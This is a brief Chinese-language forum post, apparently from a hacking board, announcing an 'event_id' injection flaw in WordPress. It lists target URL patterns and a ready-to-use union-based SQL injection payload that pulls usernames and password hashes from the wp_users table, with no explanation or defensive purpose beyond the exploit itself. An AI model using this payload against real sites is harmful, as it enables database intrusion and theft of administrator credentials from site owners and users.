WordPress最新event_id注入漏洞
===[ Exploit ]===www.WordPress.com/?event_id=
www.WordPress.com/Path/?event_id=
Exploit:
null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users
页:
[1]